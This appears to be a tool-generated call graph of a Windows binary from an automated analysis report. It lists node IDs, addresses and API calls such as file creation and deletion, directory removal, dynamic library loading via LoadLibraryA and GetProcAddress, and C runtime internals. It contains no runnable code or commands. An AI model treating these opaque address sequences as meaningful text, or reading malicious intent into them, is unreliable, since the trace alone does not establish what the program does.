143c15a 56778->56822 56780->56778 56827 1423529 18 API calls _Deallocate 56780->56827 56782 143c23d 56783 143c26c 56782->56783 56828 1423529 18 API calls _Deallocate 56782->56828 56787 143c2bf 56783->56787 56829 1423556 IsProcessorFeaturePresent 56783->56829 56786 143c343 56787->56731 56788 143900e 56787->56788 56789 143901a __wsopen_s 56788->56789 56848 142703f EnterCriticalSection 56789->56848 56791 1439021 56792 1439046 56791->56792 56797 14390b5 EnterCriticalSection 56791->56797 56798 1439068 56791->56798 56852 1438de8 56792->56852 56797->56798 56799 14390c2 LeaveCriticalSection 56797->56799 56849 1439118 56798->56849 56799->56791 56801 143c135 CreateFileW 56801->56735 56802->56738 56803->56739 56804->56740 56886 14391b2 56805->56886 56807 14310f9 56891 1439121 SetStdHandle 56807->56891 56809 14310f3 56809->56807 56812 14391b2 __wsopen_s 18 API calls 56809->56812 56819 143112b 56809->56819 56810 14391b2 __wsopen_s 18 API calls 56813 1431137 CloseHandle 56810->56813 56811 1431151 56814 1431179 56811->56814 56815 143116d __dosmaperr 56811->56815 56816 1431122 56812->56816 56813->56807 56817 1431143 GetLastError 56813->56817 56814->56731 56815->56814 56818 14391b2 __wsopen_s 18 API calls 56816->56818 56817->56807 56818->56819 56819->56807 56819->56810 56820->56747 56821->56748 56824 143c172 56822->56824 56823 143c18d 56823->56782 56824->56823 56833 1423529 18 API calls _Deallocate 56824->56833 56826 143c1bc 56826->56782 56827->56778 56828->56783 56830 1423562 56829->56830 56834 142337d 56830->56834 56833->56826 56835 1423399 ___scrt_fastfail 56834->56835 56836 14233c5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56835->56836 56837 1423496 ___scrt_fastfail 56836->56837 56840 141e288 56837->56840 56839 14234b4 GetCurrentProcess TerminateProcess 56839->56786 56841 141e291 56840->56841 56842 141e293 IsProcessorFeaturePresent 56840->56842 56841->56839 56844 141e9ee 56842->56844 56847 141e9b2 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 56844->56847 56846 141ead1 56846->56839 56847->56846 56848->56791 56860 1427087 LeaveCriticalSection 56849->56860 56851 1439088 56851->56731 56851->56801 56861 14300c6 56852->56861 56854 1438e07 56856 1430123 _free 2 API calls 56854->56856 56855 1438dfa 56855->56854 56866 142fe67 56855->56866 56858 1438e5c 56856->56858 56858->56798 56859 1438f36 EnterCriticalSection 56858->56859 56859->56798 56860->56851 56864 14300d3 std::_Locinfo::_W_Getdays 56861->56864 56862 14300fe RtlAllocateHeap 56863 1430111 56862->56863 56862->56864 56863->56855 56864->56862 56864->56863 56871 142d068 EnterCriticalSection LeaveCriticalSection numpunct 56864->56871 56872 142fa7f 56866->56872 56869 142fea1 InitializeCriticalSectionAndSpinCount 56870 142fe8c 56869->56870 56870->56855 56871->56864 56873 142faad 56872->56873 56878 142faa9 56872->56878 56873->56878 56879 142f9b8 56873->56879 56876 142fac7 GetProcAddress 56877 142fad7 __CreateFrameInfo 56876->56877 56876->56878 56877->56878 56878->56869 56878->56870 56884 142f9c9 ___vcrt_FlsGetValue 56879->56884 56880 142f9e7 LoadLibraryExW 56881 142fa02 GetLastError 56880->56881 56880->56884 56881->56884 56882 142fa5d FreeLibrary 56882->56884 56883 142fa74 56883->56876 56883->56878 56884->56880 56884->56882 56884->56883 56885 142fa35 LoadLibraryExW 56884->56885 56885->56884 56887 14391d4 56886->56887 56889 14391bf 56886->56889 56888 14391f9 56887->56888 56892 1423529 18 API calls _Deallocate 56887->56892 56888->56809 56889->56809 56891->56811 56892->56889 56893 14306a7 56898 142fc12 56893->56898 56897 14306bb 56899 142fa7f __CreateFrameInfo 5 API calls 56898->56899 56900 142fc2e 56899->56900 56901 142fc46 TlsAlloc 56900->56901 56902 142fc37 56900->56902 56901->56902 56902->56897 56903 14305f2 GetLastError 56902->56903 56904 1430609 56903->56904 56905 14300c6 __Getctype 3 API calls 56904->56905 56913 1430615 SetLastError 56904->56913 56907 143063d 56905->56907 56908 143067d 56907->56908 56909 1430645 56907->56909 56915 14302c9 EnterCriticalSection LeaveCriticalSection __Getctype 56908->56915 56910 1430123 _free 2 API calls 56909->56910 56910->56913 56912 1430688 56914 1430123 _free 2 API calls 56912->56914 56913->56897 56914->56913 56915->56912 56916 14348a6 56917 14348b3 56916->56917 56919 14348cb 56916->56919 56950 1423529 18 API calls _Deallocate 56917->56950 56920 143492a 56919->56920 56928 14348c3 56919->56928 56951 143ccb0 5 API calls 2 library calls 56919->56951 56934 143117f 56920->56934 56923 1434942 56939 14343e2 56923->56939 56925 1434949 56926 143117f __fread_nolock 18 API calls 56925->56926 56925->56928 56927 1434976 56926->56927 56927->56928 56929 143117f __fread_nolock 18 API calls 56927->56929 56930 1434984 56929->56930 56930->56928 56931 143117f __fread_nolock 18 API calls 56930->56931 56932 1434994 56931->56932 56933 143117f __fread_nolock 18 API calls 56932->56933 56933->56928 56935 14311a0 56934->56935 56936 143118b 56934->56936 56935->56923 56952 1423529 18 API calls _Deallocate 56936->56952 56938 143119b 56938->56923 56940 14343ee __wsopen_s 56939->56940 56941 14343f6 56940->56941 56942 1434462 56940->56942 56944 143444d 56940->56944 56941->56925 56953 1438f36 EnterCriticalSection 56942->56953 56994 1423529 18 API calls _Deallocate 56944->56994 56945 1434468 56946 1434484 56945->56946 56954 14344f6 56945->56954 56993 14344c3 LeaveCriticalSection 56946->56993 56950->56928 56951->56920 56952->56938 56953->56945 56955 1434520 56954->56955 56956 1434508 56954->56956 56955->56956 56958 143459a 56955->56958 56959 143456b 56955->56959 56956->56946 56960 14345b3 56958->56960 56961 143460a 56958->56961 56966 14345ce 56958->56966 57009 1423529 18 API calls _Deallocate 56959->57009 56964 14345b8 56960->56964 56960->56966 57001 143255c 56961->57001 56995 143c903 56964->56995 56965 1434621 56968 1430123 _free 2 API calls 56965->56968 57000 1423529 18 API calls _Deallocate 56966->57000 56967 1434761 56970 14347d7 56967->56970 56973 143477a GetConsoleMode 56967->56973 56971 143462a 56968->56971 56972 14347db ReadFile 56970->56972 56974 1430123 _free 2 API calls 56971->56974 56975 14347f5 56972->56975 56976 143484f GetLastError 56972->56976 56973->56970 56977 143478b 56973->56977 56978 1434631 56974->56978 56975->56976 56980 14347cc 56975->56980 56979 1434873 56976->56979 56990 14345e5 __fread_nolock 56976->56990 56977->56972 56981 1434791 ReadConsoleW 56977->56981 56978->56990 57006 143cafc 21 API calls __fread_nolock 56978->57006 56983 14347b3 __dosmaperr 56979->56983 56979->56990 56986 1434831 56980->56986 56987 143481a 56980->56987 56980->56990 56981->56980 56984 14347ad GetLastError 56981->56984 56983->56990 56984->56983 56985 1430123 _free 2 API calls 56985->56956 56989 1434848 56986->56989 56986->56990 57007 1434210 24 API calls 2 library calls 56987->57007 57008 143403f 22 API calls __fread_nolock 56989->57008 56990->56985 56992 143484d 56992->56990 56993->56941 56994->56941 56996 143c91d 56995->56996 56997 143c910 56995->56997 56998 143c929 56996->56998 57010 1423529 18 API calls _Deallocate 56996->57010 56997->56967 56998->56967 57000->56990 57002 1432598 57001->57002 57003 143256a std::_Locinfo::_W_Getdays 57001->57003 57002->56965 57003->57002 57004 1432585 RtlAllocateHeap 57003->57004 57011 142d068 EnterCriticalSection LeaveCriticalSection numpunct 57003->57011 57004->57002 57004->57003 57006->56964 57007->56990 57008->56992 57009->56956 57010->56997 57011->57003 57012 142f984 57013 142fa7f __CreateFrameInfo 5 API calls 57012->57013 57014 142f99a 57013->57014 57015 1430e65 57016 1430e72 57015->57016 57017 1430e7d 57015->57017 57019 143255c std::_Locinfo::_W_Getdays 3 API calls 57016->57019 57018 1430e85 57017->57018 57023 1430e8e std::_Locinfo::_W_Getdays 57017->57023 57020 1430123 _free 2 API calls 57018->57020 57022 1430e7a 57019->57022 57020->57022 57021 1430eb8 RtlReAllocateHeap 57021->57022 57021->57023 57023->57021 57023->57022 57025 142d068 EnterCriticalSection LeaveCriticalSection numpunct 57023->57025 57025->57023 57026 1402fc8 57031 13f8fa2 57026->57031 57028 1402fc0 57030 1403eab 57028->57030 57047 1402e43 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 57028->57047 57032 13f8fbb 57031->57032 57038 13f8fd1 ___scrt_fastfail 57031->57038 57033 13f8fd8 57032->57033 57034 13f8fc6 57032->57034 57048 13f8a99 57033->57048 57056 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 57034->57056 57037 13f9047 57037->57038 57052 13e098e 57037->57052 57038->57028 57041 13f8fdf 57041->57037 57041->57038 57043 13f906d 57041->57043 57065 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 57043->57065 57045 13f9078 57046 13e06db 5 API calls 57045->57046 57046->57038 57047->57030 57049 13f8a9d 57048->57049 57051 13f8aaa 57048->57051 57066 13e0a59 6 API calls 57049->57066 57051->57041 57053 13e099b 57052->57053 57055 13e09a4 57052->57055 57067 13e071e 57053->57067 57055->57038 57057 13e06db 57055->57057 57056->57038 57058 13e0717 57057->57058 57059 13e06e6 57057->57059 57058->57038 57119 13e08c1 EnterCriticalSection GetCurrentThreadId 57059->57119 57061 13e06f7 57120 1425640 57061->57120 57065->57045 57066->57051 57068 13e073c 57067->57068 57069 13e0731 57067->57069 57071 13e074d 57068->57071 57072 13e0740 57068->57072 57082 13e0614 57069->57082 57092 13e08c1 EnterCriticalSection GetCurrentThreadId 57071->57092 57075 13e06db 5 API calls 57072->57075 57074 13e0737 57074->57055 57075->57074 57076 13e0760 57078 13e07a4 std::locale::_Locimp::_Locimp_Addfac 57076->57078 57093 13e05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 57076->57093 57081 13e07bf std::locale::_Locimp::_Locimp_Addfac 57078->57081 57094 13e05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 57078->57094 57095 13e08e2 LeaveCriticalSection 57081->57095 57083 13e062b 57082->57083 57091 13e06d1 57082->57091 57096 13e04e2 57083->57096 57085 13e0660 ___std_exception_copy 57090 13e0677 ___std_exception_copy 57085->57090 57103 13e05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 57085->57103 57104 13e08e2 LeaveCriticalSection 57090->57104 57091->57074 57092->57076 57093->57078 57094->57081 57095->57074 57097 13e04eb 57096->57097 57100 13e04f2 57096->57100 57106 13e082c 57097->57106 57105 13e08c1 EnterCriticalSection GetCurrentThreadId 57100->57105 57101 13e04fe 57101->57085 57102 13e05aa EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 57101->57102 57102->57085 57103->57090 57104->57091 57105->57101 57107 13e0853 57106->57107 57108 13e0839 57106->57108 57111 13e0877 57107->57111 57112 13e0864 Sleep 57107->57112 57113 13e0875 57107->57113 57116 13e0929 57108->57116 57110 13e0841 57110->57113 57114 13e0847 InitializeCriticalSection 57110->57114 57115 13e0880 InitializeCriticalSection 57111->57115 57112->57107 57113->57100 57114->57113 57115->57113 57115->57115 57117 13e0614 6 API calls 57116->57117 57118 13e0933 ___scrt_fastfail 57117->57118 57118->57110 57119->57061 57121 1430123 _free 2 API calls 57120->57121 57122 13e070c 57121->57122 57123 13e08e2 LeaveCriticalSection 57122->57123 57123->57058 57124 142dc58 57127 1438c04 57124->57127 57128 1438c14 57127->57128 57129 142dc67 57127->57129 57128->57129 57131 14333ad 57128->57131 57132 14333b9 __wsopen_s 57131->57132 57143 142703f EnterCriticalSection 57132->57143 57134 14333c0 57144 1438e98 57134->57144 57139 14333d9 57156 14332f9 GetStdHandle GetFileType 57139->57156 57140 14333ef 57140->57128 57142 14333de 57157 1433404 LeaveCriticalSection std::_Lockit::~_Lockit 57142->57157 57143->57134 57145 1438ea4 __wsopen_s 57144->57145 57146 1438ece 57145->57146 57147 1438ead 57145->57147 57158 142703f EnterCriticalSection 57146->57158 57159 1423529 18 API calls _Deallocate 57147->57159 57150 14333cf 57150->57142 57155 1433243 26 API calls 57150->57155 57151 1438f06 57160 1438f2d LeaveCriticalSection std::_Lockit::~_Lockit 57151->57160 57153 1438eda 57153->57151 57154 1438de8 __wsopen_s 11 API calls 57153->57154 57154->57153 57155->57139 57156->57142 57157->57140 57158->57153 57159->57150 57160->57150 57161 141e0ea 57166 141e5ae SetUnhandledExceptionFilter 57161->57166 57163 141e0ef 57167 142f63f 18 API calls __wsopen_s 57163->57167 57165 141e0fa 57166->57163 57167->57165 57168 141e0fc 57169 141e108 __wsopen_s 57168->57169 57170 141e268 57169->57170 57175 141e139 57169->57175 57234 141e44c IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 57170->57234 57172 141e26f 57235 142287e 57172->57235 57176 141e18b ___scrt_release_startup_lock 57175->57176 57180 141e158 57175->57180 57178 141e199 57176->57178 57181 141e1a1 ___scrt_is_nonwritable_in_current_image 57178->57181 57182 141e1ac 57178->57182 57179 141e27d 57181->57182 57183 141e1c7 ___scrt_is_nonwritable_in_current_image 57182->57183 57184 141e1d9 57182->57184 57183->57184 57185 141e1d2 57183->57185 57196 142d7ec 57184->57196 57231 1422858 35 API calls 4 library calls 57185->57231 57188 141e1df 57200 13dc93c 57188->57200 57197 142d7f5 57196->57197 57198 142d7fa 57196->57198 57239 142d550 57197->57239 57198->57188 57201 13dc946 numpunct 57200->57201 57427 1422c70 57201->57427 57203 13dc957 57430 13c8f5d 57203->57430 57205 13dc96b 57435 13c3406 57205->57435 57207 13dc9fe 57444 13c3292 57207->57444 57209 13dca20 57451 13c83d5 57209->57451 57215 13dcc42 57531 13dbcd1 57215->57531 57217 13dcc47 57552 13d3e7b 57217->57552 57225 13dbe05 164 API calls 57230 13dcaa4 57225->57230 57229 13de8c7 19 API calls 57229->57230 57230->57215 57230->57225 57230->57229 57231->57184 57234->57172 59196 142271c 57235->59196 57238 1422842 16 API calls __CreateFrameInfo 57238->57179 57240 142d56f 57239->57240 57241 142d559 57239->57241 57240->57198 57241->57240 57245 142d57c 57241->57245 57243 142d566 57243->57240 57258 142d6ce 6 API calls 3 library calls 57243->57258 57246 142d585 57245->57246 57247 142d588 57245->57247 57246->57243 57259 1438509 57247->57259 57252 142d59a 57255 1430123 _free 2 API calls 57252->57255 57254 142d5a5 57257 1430123 _free 2 API calls 57254->57257 57256 142d5c9 57255->57256 57256->57243 57257->57252 57258->57240 57260 1438512 57259->57260 57261 142d58f 57259->57261 57278 1430558 57260->57278 57265 14387fd GetEnvironmentStringsW 57261->57265 57266 1438814 57265->57266 57267 143886a 57265->57267 57270 143749b __cftof WideCharToMultiByte 57266->57270 57268 1438873 FreeEnvironmentStringsW 57267->57268 57269 142d594 57267->57269 57268->57269 57269->57252 57277 142d5cf 18 API calls 4 library calls 57269->57277 57271 143882d 57270->57271 57271->57267 57272 143255c std::_Locinfo::_W_Getdays 3 API calls 57271->57272 57273 143883d 57272->57273 57274 1438855 57273->57274 57275 143749b __cftof WideCharToMultiByte 57273->57275 57276 1430123 _free 2 API calls 57274->57276 57275->57274 57276->57267 57277->57254 57279 1430563 57278->57279 57281 14300c6 __Getctype 3 API calls 57279->57281 57291 143056f 57279->57291 57283 1430593 57281->57283 57285 143059b 57283->57285 57286 14305cf 57283->57286 57284 14305e8 57292 1438350 57284->57292 57287 1430123 _free 2 API calls 57285->57287 57306 14302c9 EnterCriticalSection LeaveCriticalSection __Getctype 57286->57306 57287->57291 57289 14305da 57290 1430123 _free 2 API calls 57289->57290 57290->57291 57291->57284 57307 142cf95 35 API calls __CreateFrameInfo 57291->57307 57308 1438469 57292->57308 57297 143837c 57297->57261 57298 143255c std::_Locinfo::_W_Getdays 3 API calls 57299 143838d 57298->57299 57303 14383ba 57299->57303 57326 1438564 57299->57326 57301 1430123 _free 2 API calls 57302 14383cd 57301->57302 57302->57261 57303->57301 57304 14383b2 57304->57303 57305 1430123 _free 2 API calls 57304->57305 57305->57303 57306->57289 57309 1438475 __wsopen_s 57308->57309 57315 143848f 57309->57315 57337 142703f EnterCriticalSection 57309->57337 57311 143849f 57317 1430123 _free 2 API calls 57311->57317 57318 14384cb 57311->57318 57312 1438363 57319 14380f9 57312->57319 57315->57312 57339 142cf95 35 API calls __CreateFrameInfo 57315->57339 57317->57318 57338 14384e8 LeaveCriticalSection std::_Lockit::~_Lockit 57318->57338 57340 1422f3e 57319->57340 57322 143811a GetOEMCP 57325 1438143 57322->57325 57323 143812c 57324 1438131 GetACP 57323->57324 57323->57325 57324->57325 57325->57297 57325->57298 57327 14380f9 37 API calls 57326->57327 57328 1438584 57327->57328 57330 14385fa ___scrt_fastfail 57328->57330 57331 14385be IsValidCodePage 57328->57331 57329 141e288 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 57332 1438755 57329->57332 57330->57329 57331->57330 57333 14385d0 57331->57333 57332->57304 57334 14385ff GetCPInfo 57333->57334 57336 14385d9 ___scrt_fastfail 57333->57336 57334->57330 57334->57336 57368 14381cf 57336->57368 57337->57311 57338->57315 57341 1422f55 57340->57341 57342 1422f5e 57340->57342 57341->57322 57341->57323 57342->57341 57348 143049b GetLastError 57342->57348 57346 1422f94 57365 1430f9d 35 API calls __fassign 57346->57365 57349 14304b2 57348->57349 57350 14300c6 __Getctype 3 API calls 57349->57350 57362 14304be SetLastError 57349->57362 57356 14304e6 57350->57356 57352 1430552 57367 142cf95 35 API calls __CreateFrameInfo 57352->57367 57353 1422f7e 57364 1430f70 35 API calls __Getctype 57353->57364 57357 1430526 57356->57357 57358 14304ee 57356->57358 57366 14302c9 EnterCriticalSection LeaveCriticalSection __Getctype 57357->57366 57360 1430123 _free 2 API calls 57358->57360 57360->57362 57361 1430531 57363 1430123 _free 2 API calls 57361->57363 57362->57352 57362->57353 57363->57362 57364->57346 57365->57341 57366->57361 57369 14381f7 GetCPInfo 57368->57369 57378 14382c0 57368->57378 57373 143820f 57369->57373 57369->57378 57370 141e288 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 57372 143834e 57370->57372 57372->57330 57379 1434eb2 57373->57379 57377 143169d 38 API calls 57377->57378 57378->57370 57380 1422f3e __fassign 35 API calls 57379->57380 57381 1434ed2 57380->57381 57382 143741f __fassign MultiByteToWideChar 57381->57382 57385 1434eff 57382->57385 57383 1434f90 57384 141e288 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 57383->57384 57386 1434fb3 57384->57386 57385->57383 57388 143255c std::_Locinfo::_W_Getdays 3 API calls 57385->57388 57390 1434f25 __alloca_probe_16 ___scrt_fastfail 57385->57390 57394 143169d 57386->57394 57387 1434f8a 57399 141ce8a HeapFree GetLastError ~ctype 57387->57399 57388->57390 57390->57387 57391 143741f __fassign MultiByteToWideChar 57390->57391 57392 1434f73 57391->57392 57392->57387 57393 1434f7a GetStringTypeW 57392->57393 57393->57387 57395 1422f3e __fassign 35 API calls 57394->57395 57396 14316b0 57395->57396 57400 14314b3 57396->57400 57399->57383 57401 14314ce __Strcoll 57400->57401 57402 143741f __fassign MultiByteToWideChar 57401->57402 57406 1431512 57402->57406 57403 1431677 57404 141e288 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 57403->57404 57405 143168a 57404->57405 57405->57377 57406->57403 57407 143255c std::_Locinfo::_W_Getdays 3 API calls 57406->57407 57410 1431537 __alloca_probe_16 57406->57410 57407->57410 57408 143741f __fassign MultiByteToWideChar 57411 143157d 57408->57411 57410->57408 57412 14315b3 57410->57412 57411->57412 57414 143255c std::_Locinfo::_W_Getdays 3 API calls 57411->57414 57416 14315fd __alloca_probe_16 57411->57416 57425 141ce8a HeapFree GetLastError ~ctype 57412->57425 57413 1431668 57424 141ce8a HeapFree GetLastError ~ctype 57413->57424 57414->57416 57416->57413 57421 143749b 57416->57421 57418 143165f 57418->57413 57419 1431694 57418->57419 57426 141ce8a HeapFree GetLastError ~ctype 57419->57426 57422 14374b4 WideCharToMultiByte 57421->57422 57422->57418 57424->57412 57425->57403 57426->57412 57428 1422c87 QueryPerformanceCounter 57427->57428 57429 1422c95 57427->57429 57428->57429 57429->57203 57431 13c8f67 numpunct 57430->57431 57434 13c8fc9 57431->57434 57847 1422cca 57431->57847 57850 13ddf67 57431->57850 57434->57205 57436 13c341a 57435->57436 57906 1406531 57436->57906 57438 13c3422 57439 13c3454 57438->57439 57923 13c32c1 57438->57923 57441 13c3465 57439->57441 57939 13c29c2 19 API calls 2 library calls 57439->57939 57441->57207 57445 13c32a4 57444->57445 58044 1406087 CreateDirectoryW 57445->58044 57448 13c32b0 57448->57209 58057 13c8347 57451->58057 57453 13c83dc 57454 13c3507 57453->57454 57456 13c353f 57454->57456 57455 13c358c LoadLibraryA 57458 13c35a3 57455->57458 57462 13c35c2 57455->57462 57456->57455 57457 13c363f LoadLibraryA 57461 13c3650 57457->57461 57465 13c36b8 57457->57465 57459 13c35b9 GetProcAddress 57458->57459 57459->57462 57460 13c3732 LoadLibraryA 57466 13c374a 57460->57466 57472 13c37f0 57460->57472 57463 13c365c GetProcAddress 57461->57463 57462->57457 57470 13c366a 57463->57470 57464 13c3862 LoadLibraryA 57473 13c387a 57464->57473 57476 13c3930 57464->57476 57465->57460 57467 13c3760 GetProcAddress 57466->57467 57468 13c3779 57467->57468 57477 13c3780 GetProcAddress 57468->57477 57469 13c367b GetProcAddress 57481 13c3689 57469->57481 57470->57469 57470->57470 57471 13c39a2 LoadLibraryA 57475 13c39f0 57471->57475 57483 13c39b6 57471->57483 57472->57464 57474 13c3890 GetProcAddress 57473->57474 57478 13c38a9 57474->57478 57502 13d674b 57475->57502 57476->57471 57480 13c3793 57477->57480 57484 13c38b0 GetProcAddress 57478->57484 57479 13c369a GetProcAddress 57482 13c36a8 57479->57482 57487 13c379a GetProcAddress 57480->57487 57481->57479 57481->57481 57486 13c36af GetProcAddress 57482->57486 57485 13c39c2 GetProcAddress 57483->57485 57488 13c38c3 57484->57488 57489 13c39db 57485->57489 57486->57465 57493 13c37ad 57487->57493 57490 13c38ca GetProcAddress 57488->57490 57491 13c39e2 GetProcAddress 57489->57491 57496 13c38dd 57490->57496 57491->57475 57492 13c37be GetProcAddress 57497 13c37d1 57492->57497 57493->57492 57493->57493 57494 13c38ee GetProcAddress 57498 13c3901 57494->57498 57495 13c37e2 GetProcAddress 57495->57472 57496->57494 57496->57496 57497->57495 57497->57497 57499 13c3908 GetProcAddress 57498->57499 57500 13c391b 57499->57500 57501 13c3922 GetProcAddress 57500->57501 57501->57476 57504 13d6755 numpunct 57502->57504 58071 13de8c7 57504->58071 57505 13d67f7 58076 13c3174 57505->58076 57507 13d6821 57508 13d683a 57507->57508 57509 13d69f1 57507->57509 58082 13c2e70 57508->58082 58122 13def47 57509->58122 57514 13d6882 57528 13d68d0 57514->57528 58107 13c16cb 21 API calls 57514->58107 57516 13d69ac 57518 13d69b7 57516->57518 58120 13c16cb 21 API calls 57516->58120 57520 13d69c3 57518->57520 58121 13c16cb 21 API calls 57518->58121 57522 13ddf41 18 API calls 57520->57522 57524 13d69ef 57522->57524 58103 13ddf41 57524->58103 57527 13ddf41 18 API calls 57527->57528 57528->57516 57528->57527 58092 13c2a7c 57528->58092 58098 13c2ebb 57528->58098 58108 13de5d4 57528->58108 58112 13de143 57528->58112 58115 13de0ab 57528->58115 58119 13dee65 19 API calls 2 library calls 57528->58119 57533 13dbcdb numpunct 57531->57533 57535 13dbd46 57533->57535 58148 13c8f20 57533->58148 58731 13deb79 19 API calls 4 library calls 57533->58731 57536 13dbdb7 57535->57536 58151 13c9294 57535->58151 58260 13cc9ec 57535->58260 58280 13db7c3 57535->58280 58312 13daa32 57535->58312 58321 13cd397 57535->58321 58369 13cd88b 57535->58369 58417 13cddc0 57535->58417 58455 13ce23e 57535->58455 58507 13ce85f 57535->58507 58545 13cecb9 57535->58545 58593 13cf1a2 57535->58593 58641 13cf68f 57535->58641 58679 13cfb09 57535->58679 58727 13dcf2d 57536->58727 57553 13d3e85 numpunct 57552->57553 59122 142534a 57553->59122 57557 13d3eb4 57558 1422c70 QueryPerformanceCounter 57557->57558 57559 13d3ebe GetModuleHandleA GetModuleFileNameA 57558->57559 57560 13d3f1d 57559->57560 57561 13ddf41 18 API calls 57560->57561 57562 13d41b5 57561->57562 57563 13ddf41 18 API calls 57562->57563 57564 13d41c0 57563->57564 57565 13ddf41 18 API calls 57564->57565 57566 13d41cb 57565->57566 57567 13ddf41 18 API calls 57566->57567 57568 13d41da 57567->57568 57569 13c8f5d 36 API calls 57568->57569 57570 13d41e8 57569->57570 57848 143049b __Getctype 35 API calls 57847->57848 57849 1422ccf 57848->57849 57849->57431 57851 13ddf8e 57850->57851 57852 13ddf73 57850->57852 57854 13df518 57851->57854 57852->57431 57855 13df539 57854->57855 57856 13df5ba 57854->57856 57863 13df70f 57855->57863 57874 13c12de 19 API calls std::exception::exception 57856->57874 57858 13df5bf 57860 13df555 ctype 57861 13df58f ctype 57860->57861 57870 13df6e3 57860->57870 57861->57852 57864 13df71c 57863->57864 57865 13df725 57863->57865 57875 13dff77 57864->57875 57867 13df731 57865->57867 57889 141dc67 57865->57889 57867->57860 57869 13df722 57869->57860 57871 13df6f0 57870->57871 57873 13df6fd error_info_injector 57870->57873 57905 13c12ba 18 API calls 2 library calls 57871->57905 57873->57861 57874->57858 57876 13dff88 57875->57876 57878 13c1267 Concurrency::cancel_current_task 57875->57878 57877 141dc67 numpunct 19 API calls 57876->57877 57879 13dff8e 57877->57879 57899 1420ef8 RaiseException 57878->57899 57880 13dff95 57879->57880 57901 14234c5 18 API calls 3 library calls 57879->57901 57880->57869 57882 13c1283 57900 13c11d7 18 API calls ___std_exception_copy 57882->57900 57885 13c1292 57885->57869 57886 1423548 57887 1423556 __Getcoll 11 API calls 57886->57887 57888 1423555 57887->57888 57891 141dc6c ___std_exception_copy 57889->57891 57890 141dc86 57890->57869 57891->57890 57894 13c1267 Concurrency::cancel_current_task 57891->57894 57904 142d068 EnterCriticalSection LeaveCriticalSection numpunct 57891->57904 57893 141dc92 57893->57893 57894->57893 57902 1420ef8 RaiseException 57894->57902 57896 13c1283 57903 13c11d7 18 API calls ___std_exception_copy 57896->57903 57898 13c1292 57898->57869 57899->57882 57900->57885 57901->57886 57902->57896 57903->57898 57904->57891 57905->57873 57907 1406573 57906->57907 57908 1406579 RemoveDirectoryW 57907->57908 57909 14065da 57907->57909 57911 1406594 GetLastError 57908->57911 57918 1406586 57908->57918 57940 14064fd CreateFileW 57909->57940 57912 14065a1 DeleteFileW 57911->57912 57913 14065b4 GetLastError 57911->57913 57915 14065ae GetLastError 57912->57915 57912->57918 57913->57918 57915->57913 57916 14065f6 57943 1405d9c 57916->57943 57918->57438 57919 1406636 GetLastError 57920 1406643 57919->57920 57920->57916 57921 140666a SetFileInformationByHandle 57920->57921 57921->57916 57922 1406670 GetLastError 57921->57922 57922->57916 57924 13c32cb numpunct 57923->57924 57956 13de75f 57924->57956 57926 13c339d 57936 13c33a9 57926->57936 57980 13c16cb 21 API calls 57926->57980 57927 13c33b8 57932 13c33c7 57927->57932 57981 13c16cb 21 API calls 57927->57981 57928 13c3381 57928->57926 57928->57927 57933 1406531 46 API calls 57932->57933 57932->57936 57933->57932 57934 13c32c1 64 API calls 57938 13c32ee 57934->57938 57935 1406531 46 API calls 57935->57938 57936->57439 57938->57926 57938->57927 57938->57928 57938->57934 57938->57935 57968 13c2b2d 57938->57968 57972 13c2b95 57938->57972 57941 1406522 GetLastError 57940->57941 57942 140652a 57940->57942 57941->57942 57942->57916 57942->57919 57944 1405db2 57943->57944 57945 1405da5 CloseHandle 57943->57945 57944->57918 57945->57944 57946 1405db6 57945->57946 57949 1426ace 57946->57949 57950 1426ada __wsopen_s 57949->57950 57951 143049b __Getctype 35 API calls 57950->57951 57954 1426adf 57951->57954 57955 142cf95 35 API calls __CreateFrameInfo 57954->57955 57957 13de769 numpunct 57956->57957 57982 13c2caf 57957->57982 57960 13de7da 57986 1406107 57960->57986 57961 141dc67 numpunct 19 API calls 57963 13de795 57961->57963 57999 13c2dfb 19 API calls numpunct 57963->57999 57964 13de7e8 57964->57938 57966 13de7c4 57966->57960 58000 13c16cb 21 API calls 57966->58000 57969 13c2b4e 57968->57969 57970 13c2b57 57968->57970 57969->57938 58025 14061b5 57970->58025 57977 13c2ba4 57972->57977 57973 14060e6 ___std_fs_directory_iterator_advance@8 2 API calls 57973->57977 57974 13c2bd7 57975 13c2bd5 57974->57975 58043 13c16cb 21 API calls 57974->58043 57975->57938 57977->57973 57977->57974 57977->57975 57978 13c2bcb 57977->57978 58042 13c2d2b 19 API calls 2 library calls 57978->58042 57980->57936 57981->57932 57983 13c2cb9 numpunct 57982->57983 58001 13c2bf0 57983->58001 57987 1406110 FindClose 57986->57987 57988 140611d 57986->57988 57987->57988 57989 1406121 57987->57989 57988->57964 57990 1426ace _unexpected 35 API calls 57989->57990 57991 1406126 57990->57991 57992 1406107 ___std_fs_directory_iterator_open@12 35 API calls 57991->57992 57993 1406136 FindFirstFileExW 57992->57993 57994 1406150 GetLastError 57993->57994 57995 140617f 57993->57995 57996 1406160 FindFirstFileExW 57994->57996 57997 140615b 57994->57997 57995->57964 57996->57995 57998 1406177 GetLastError 57996->57998 57997->57995 57997->57996 57998->57995 57999->57966 58000->57960 58003 13c2bfa numpunct 58001->58003 58002 13c2c88 58002->57960 58002->57961 58003->58002 58009 13c206f 58003->58009 58005 13c2c48 58013 1406127 58005->58013 58007 13c2c64 58007->58002 58021 14060e6 FindNextFileW 58007->58021 58011 13c2085 58009->58011 58010 13c2135 58010->58005 58011->58010 58024 13dd7d4 19 API calls 58011->58024 58014 1406107 ___std_fs_directory_iterator_open@12 40 API calls 58013->58014 58015 1406136 FindFirstFileExW 58014->58015 58016 1406150 GetLastError 